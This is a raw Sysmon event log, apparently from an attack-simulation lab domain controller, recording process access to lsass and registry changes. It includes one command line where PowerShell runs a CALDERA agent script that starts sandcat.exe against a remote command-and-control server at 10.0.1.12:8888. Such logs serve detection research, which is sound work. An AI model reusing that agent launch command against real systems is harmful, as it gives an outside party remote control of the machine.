13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.774{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:14.711{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\GuidBinary Data 12241200x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-DeleteValue2020-12-08 13:53:14.711{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\Guid 10341000x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.696{10ACEC4A-853E-5FCF-0A00-000000009101}8521192C:\Windows\system32\services.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.696{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.696{10ACEC4A-853E-5FCF-0A00-000000009101}852936C:\Windows\system32\services.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.702{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k smbsvcsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.696{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.696{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.696{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:14.696{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:14.696{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:13.914{10ACEC4A-8541-5FCF-1A00-000000009101}21922508C:\Windows\system32\conhost.exe{10ACEC4A-8549-5FCF-2700-000000009101}2740C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:13.914{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8549-5FCF-2700-000000009101}2740C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:13.914{10ACEC4A-8541-5FCF-1800-000000009101}21242848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8549-5FCF-2700-000000009101}2740C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+74472519(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+73913123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+73912df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+743c46d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+738d398a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+73931e59(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+739154be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+739154be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+7391534f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+739072d4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+73913807(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+739133a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+73913123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+73912df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+743c46d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+738f9c55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+738f9225(wow64) 154100x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:13.864{10ACEC4A-8549-5FCF-2700-000000009101}2740C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_agent.ps1 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:13.633{10ACEC4A-8541-5FCF-1200-000000009101}12121452C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:13.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:12.258{10ACEC4A-8548-5FCF-2600-000000009101}24682444C:\Windows\system32\conhost.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:12.258{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:12.243{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 